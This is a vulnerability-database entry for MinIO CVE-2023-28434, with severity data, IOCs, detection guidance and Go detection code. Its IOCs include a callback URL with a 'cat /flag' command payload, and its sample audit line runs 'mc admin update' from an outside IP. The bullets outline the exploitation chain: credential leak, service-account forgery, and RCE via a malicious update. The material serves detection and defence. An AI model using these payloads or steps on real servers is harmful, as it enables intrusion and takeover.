cbcvebase.
CVE-2023-28434
published 2023-03-22


Priority: P185 · Severity: high · CVSS 3.1 base score: 8.8
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Flags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2023-10-10
Exploited in the wild
EPSS: 6.74% (93.1st percentile)
Minio is a Multi-Cloud Object Storage framework. Prior to RELEASE.2023-03-20T20-16-18Z, an attacker can use crafted requests to bypass the metadata bucket name check and put an object into any bucket, including the reserved `.minio.sys` metadata bucket, while the server processes a `PostPolicyBucket` request (the browser-style HTML form POST upload). To carry out this attack, the attacker needs credentials with `arn:aws:s3:::*` permission, and Console API access must be enabled. This issue has been patched in RELEASE.2023-03-20T20-16-18Z. As a workaround, disable Console (browser) API access by setting `MINIO_BROWSER=off`.

Affected (3 ranges)

Vendor       Product       Version range                        Fixed in
github.com   minio/minio   >= 0, < 0.0.0-202303200415           0.0.0-202303200415
minio        minio         < RELEASE.2023-03-20T20-16-18Z       RELEASE.2023-03-20T20-16-18Z
minio        minio         < 2023-03-20t20-16-18z               2023-03-20t20-16-18z

Detection & IOCs (extracted from sources)

path  /.minio.sys/
path  .minio.sys/config
path  config/iam/service-accounts/TFNS/identity.json
url   http://47.251.10.169:35367/anything?alive=cat%20/flag
ip    47.251.10.169

The url/ip pair carries a CTF-style `cat /flag` payload, i.e. it is a PoC callback; treat it as an example indicator rather than durable attacker infrastructure. The three paths are the durable signal.
  • Detect CVE-2023-28434 exploitation attempts by monitoring HTTP POST requests to MinIO endpoints whose Content-Type header is a non-canonical variant such as 'multipart/form-datA' (capital A). The server-side route matcher used the regex 'multipart/form-data*'; read as a regex, the trailing 'a*' means "zero or more a", so the pattern also matches the truncated string 'multipart/form-dat' and, as a substring match, any value that merely contains it. Such a request still satisfies the server-side matcher while exact-string rules for 'multipart/form-data' in proxies and SIEMs do not fire on it.
  • Monitor for POST requests targeting the '/.minio.sys/' bucket path (MinIO's reserved metadata bucket), especially writes under 'config/iam/service-accounts/': a forged service-account identity.json there is the privilege-escalation write path used in exploitation.
  • Alert on 'mc admin update' commands pointing at external or untrusted URLs. This is the RCE delivery mechanism chained after the CVE-2023-28434 privilege escalation: with admin credentials in hand, the evil_minio project has the server update itself from an attacker-controlled binary.
  • CVE-2023-28434 is frequently chained with CVE-2023-28432, an information disclosure in cluster deployments that leaks environment variables including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD via a POST to /minio/bootstrap/v1/verify. Detections should look for both: the bootstrap-verify probe for the credential leak, followed by PostPolicyBucket abuse.
  • The attack requires credentials with 'arn:aws:s3:::*' permission and enabled Console API access. Audit IAM policies on MinIO instances for overly broad S3 wildcard permissions.
  • CVE-2023-28434 only affects MinIO versions prior to RELEASE.2023-03-20T20-16-18Z; instances already on that release or later are not vulnerable.
  • Exploitation requires Console API access to be enabled. The documented workaround is to disable it with MINIO_BROWSER=off; upgrading to the fixed release is the preferred mitigation.
  • The permissive matcher ('multipart/form-data*' also matching 'multipart/form-dat') is the root cause identified in the sources; the fix was applied in commit 67f4ba154a27a1b06e48bfabda38355a010dfca5. WAF rules should normalize Content-Type (parse the media type and compare it case-insensitively to 'multipart/form-data') rather than pattern-match the raw header string.
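The two practitioner-facing points above, the permissive Content-Type matcher and the detection bullets, as one worked example. This is added illustration code, not MinIO's router or anything from the cited PoCs: `Request`, `SampleRequests`, the `trustedUpdateHosts` allowlist (`dl.min.io`) and the sample `mc` command line are constructed assumptions, and `IsMetaBucket` is a simplified stand-in for MinIO's own reserved-bucket check. It shows why `multipart/form-data*` admits truncated and capitalised values, how to normalize the header before comparing, and runs the page's detections over constructed request records whose paths are taken from the IOC list above.

```go
package main

import (
	"fmt"
	"mime"
	"net/url"
	"regexp"
	"strings"
)

// Request is a constructed, minimal view of one HTTP request from a proxy log (not MinIO's audit schema).
type Request struct {
	Method, Path, ContentType string
}

// The route-matcher regex quoted on this page: the trailing "a*" means "zero
// or more a", so it matches "multipart/form-dat", and as a substring search
// it also matches "multipart/form-datA" or anything containing that prefix.
var looseMultipartRE = regexp.MustCompile("multipart/form-data*")

func LooseMatch(contentType string) bool { return looseMultipartRE.MatchString(contentType) }

// NormalizedMultipart is what a WAF or hardened router should do: parse the
// media type (lower-cased; MIME types are case-insensitive) and compare exactly.
func NormalizedMultipart(contentType string) bool {
	mt, _, err := mime.ParseMediaType(contentType)
	return err == nil && mt == "multipart/form-data"
}

// NonCanonicalMultipart flags a value the loose matcher accepts whose media
// type token is not literally "multipart/form-data"; exact-string rules miss these.
func NonCanonicalMultipart(contentType string) bool {
	token := strings.TrimSpace(strings.SplitN(contentType, ";", 2)[0])
	return LooseMatch(contentType) && token != "multipart/form-data"
}

// IsMetaBucket: is the first path segment MinIO's reserved ".minio.sys" bucket? (simplified stand-in)
func IsMetaBucket(path string) bool {
	first := strings.SplitN(strings.TrimPrefix(path, "/"), "/", 2)[0]
	return strings.EqualFold(first, ".minio.sys")
}

// Scan applies the detection points above and returns one finding per match, in input order.
func Scan(reqs []Request) []string {
	var out []string
	for _, r := range reqs {
		if r.Method != "POST" {
			continue
		}
		path := strings.SplitN(r.Path, "?", 2)[0]
		if path == "/minio/bootstrap/v1/verify" {
			out = append(out, "CVE-2023-28432 credential leak probe: POST "+path)
		}
		if IsMetaBucket(path) {
			msg := "CVE-2023-28434 PostPolicy write into metadata bucket: POST " + path
			if strings.Contains(path, "config/iam/service-accounts/") {
				msg += " (service-account forgery)"
			}
			out = append(out, msg)
		}
		if NonCanonicalMultipart(r.ContentType) {
			out = append(out, "non-canonical multipart Content-Type "+r.ContentType+" on POST "+path)
		}
	}
	return out
}

// Assumed allowlist for "mc admin update"; put the mirror you really use here.
var trustedUpdateHosts = map[string]bool{"dl.min.io": true}

// SuspiciousAdminUpdate: does a shell-audit line run "mc admin update" with an http(s) URL off the allowlist?
func SuspiciousAdminUpdate(cmdline string) bool {
	if !strings.Contains(cmdline, " admin update ") {
		return false
	}
	for _, arg := range strings.Fields(cmdline) {
		if u, err := url.Parse(arg); err == nil && (u.Scheme == "http" || u.Scheme == "https") {
			return !trustedUpdateHosts[u.Hostname()]
		}
	}
	return false
}

// SampleRequests are constructed records modelled on the IOC paths above.
func SampleRequests() []Request {
	return []Request{
		{"POST", "/minio/bootstrap/v1/verify", ""},
		{"POST", "/.minio.sys/", "multipart/form-datA"},
		{"POST", "/.minio.sys/config/iam/service-accounts/TFNS/identity.json", "multipart/form-datA"},
		{"POST", "/uploads/", "multipart/form-data; boundary=abc"},
		{"PUT", "/.minio.sys/config", "application/octet-stream"},
	}
}

func main() {
	fmt.Println(strings.Join(Scan(SampleRequests()), "\n"))
	// Constructed audit line; the host is the IP from the IOC list above.
	fmt.Println(SuspiciousAdminUpdate("mc admin update local http://47.251.10.169:35367/update"))
}
```

Run it with `go run`. `Scan` returns five findings for the sample batch (the bootstrap probe, two metadata-bucket writes and two non-canonical Content-Type hits); the PUT record is ignored because the PostPolicy path is POST-only. Note that `NormalizedMultipart` accepts `multipart/form-datA`, as it should, since MIME types are case-insensitive; it is the truncated and padded variants that normalization rejects, while `NonCanonicalMultipart` is the log-side signal for any of them.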

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      8.8     HIGH       CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv         -         8.8     HIGH
vulncheck   -         8.8     HIGH
cisa        -         8.8     HIGH